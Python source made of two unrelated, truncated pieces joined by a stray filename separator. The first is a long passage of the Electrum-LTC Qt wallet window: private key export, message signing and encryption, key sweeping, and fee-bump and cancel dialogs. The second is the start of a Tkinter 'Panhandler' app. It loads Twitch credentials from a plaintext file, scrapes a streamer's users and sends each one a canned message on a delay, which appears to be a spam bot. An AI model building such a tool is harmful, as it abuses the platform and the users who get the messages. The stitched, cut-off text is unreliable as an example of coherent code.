ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key())
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(data, parent or self, title, help_text=help_text,
show_copy_text_btn=show_copy_text_btn)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
# if redeem_script:
# vbox.addWidget(QLabel(_("Redeem Script") + ':'))
# rds_e = ShowQRTextEdit(text=redeem_script)
# rds_e.addCopyButton(self.app)
# vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Litecoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Litecoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum_ltc.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum_ltc import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("litecoin:"):
self.pay_to_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"),
TRANSACTION_FILE_EXTENSION_FILTER_ANY)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(self, _('Input channel backup'), _("Channel Backup:"), _("Load backup"))
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_ltc import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
else:
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-ltc-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: PartialTransaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label_for_txid(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, coins=self.get_coins())
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_desc=tx_label)
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_('Cannot cancel transaction') + ': ' + _('unknown fee for original transaction'))
return
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Cancel transaction'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Cancel an unconfirmed RBF transaction by double-spending "
"its inputs back to your wallet with a higher fee.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.dscancel(tx=tx, new_fee_rate=new_fee_rate)
except CannotDoubleSpendTx as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
application.py
|
from tkinter import *
from panhandler import *
import threading
from subprocess import call
root = Tk()
root.configure(background='#404040', padx=10, pady=10)
root.title("Panhandler")
title = Label(root, text="That Panhandlin' Bitch")
title.configure(background='#404040', fg='#FFFFFF')
title.grid(row=0, column=0)
usernameLabel = Label(root, text="Enter your Twitch username", pady=10)
usernameLabel.configure(background='#404040', fg='#FFFFFF')
usernameLabel.grid(row=1, column=0)
credentials = open("credentials.txt", "r")
username = Entry(root, width=40)
username.grid(row=2, column=0)
username.insert(0, credentials.readline())
passwordLabel = Label(root, text="Enter your Twitch password", pady=10)
passwordLabel.configure(background='#404040', fg='#FFFFFF')
passwordLabel.grid(row=3, column=0)
password = Entry(root, show='*', width=40)
password.grid(row=4, column=0)
password.insert(0, credentials.readline())
credentials.close()
streamerLabel = Label(root, text="Enter a streamer's username", pady=10)
streamerLabel.configure(background='#404040', fg='#FFFFFF')
streamerLabel.grid(row=5, column=0)
streamer = Entry(root, width=40)
streamer.grid(row=6, column=0)
streamer.insert(0, "")
def executeScrape(username, password, streamerName, message, userDelay):
print("Ready to run scraping process for {}".format(streamerName))
scrape(username, password, streamerName, message, userDelay)
def startScrape():
usernameError = Label(root, text="Username is required")
if streamer.get():
streamerName = streamer.get()
usernameError.grid_forget()
else:
usernameError.configure(background='#404040', fg='#FFFFFF')
usernameError.grid(row=7, column=1)
message = streamermessage.get("1.0",END)
userDelay = messageDelay.get()
print("Collected user input values")
panhandle_thread = threading.Thread(target=executeScrape, name="Scraper", args=[username.get(), password.get(), streamerName, message, userDelay])# args=[username.get(), password.get(), streamerName, message, userDelay])
panhandle_thread.start()
print("Scraper for {} is now running in the background.".format(streamerName))
print("Message is: {}".format(message))
print("Delay between users is {} users".format(userDelay))
# Button to start scraping
bitchBtn = Button(root, text="Start Scraping!", command=startScrape, padx=30,\
relief=RAISED, cursor="hand2")
bitchBtn.grid(row=6, column=1)
# Message to send to streamer
streamermessageLabel = Label(root, text="Enter a message", pady=10)
streamermessageLabel.configure(background='#404040', fg='#FFFFFF')
streamermessageLabel.grid(row=7, column=0)
streamermessage = Text(root, height=5)
streamermessage.grid(row=8, column=0)
# Message delay slider
streamermessageLabel = Label(root, text="Select the user delay between messages", pady=10)
